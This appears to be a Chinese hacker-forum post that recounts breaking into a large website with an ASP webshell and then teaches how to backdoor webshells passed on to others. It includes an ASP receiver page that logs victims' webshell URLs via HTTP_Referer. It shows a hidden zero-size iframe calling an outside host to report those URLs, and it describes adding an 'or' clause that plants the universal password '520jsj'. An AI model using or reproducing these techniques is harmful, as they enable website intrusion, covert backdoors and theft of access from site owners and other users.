呵呵......最近有小菜给我一个马, 说是很不错, 还说免杀, 当时也没有注意, 有一次在高一个大站的时候, 刚好利用上, 感觉还不错, 但是我第三天就发现马没了, 郁闷死了, TMD, 当时还以为管理员发现了呢, 还好当时, 留了一个过扫描的一句话后门, (唉....怕别人进来, 我还把漏洞补了)接着, 就不说了, 然后就是传上自己的大马, 进去用雷克图扫了下, 发现好多的后门, 而且都很隐蔽。 突然感觉不对, 看来是螳螂捕蝉黄雀在后啊!马上写出解密函数, 把他解密了, 然后发现了以下代码
<iframe src=http://xxxx.xxxx.com/mm.asp width=0 height=0></iframe>
呵呵, 很熟悉吧, 访问了下, http://xxxx.xxxx.com, 卡巴立马就报警了, 靠, TMD的首页挂马了, 然后加了mm.asp, 是个空白, 真是变态, 首页挂马, 还搞了个接受页, 鄙视下, 那么下面我们进入正题。 告诉, 大家, 如何给我们的脚本木马加后门, 呵呵做收渔利哦!首先找个asp空间, 新建一个asp接收页, 代码如下:
<%url=Request.ServerVariables("HTTP_Referer")
set fs=server.CreateObject("Scripting.FileSystemObject")
set file=fs.OpenTextFile(server.MapPath("bobo.txt"),8,True)
file.writeline url
file.close
set file=nothing
set fs=nothing
%>
呵呵......HTTP_REFERER这个函数都熟悉吧, 简单来说就是获得webshell的地址然后记录在bobo.txt这里文本里, 然后里用<iframe src=网站地址 width=0 height=0></iframe>插到asp木马中, 大家可能要问了, 那只能记录地址啊, 呵呵......
还有了, 首先我们看看ASP密码验证
IF SEssIoN("web2a2dmin")<>UsERpaSs thEn
IF requeSt.FoRM("pass")<>"" TheN
iF REquesT.foRM("pass")=uSERPASS Then
SEsSIoN("web2a2dmin")=uSERPAss
呵呵, 大家都知道or的作用吧, 如果我们将第三句改为iF REquesT.foRM("pass")=uSERPASS or request.form("pass")="520jsj" Then, 怎么用, 这样我们的ASP木马就把弄了个万能密码, 密码为520jsj
呵呵.....就到这里了, 继续关注我们的网站哦, 哈哈,
……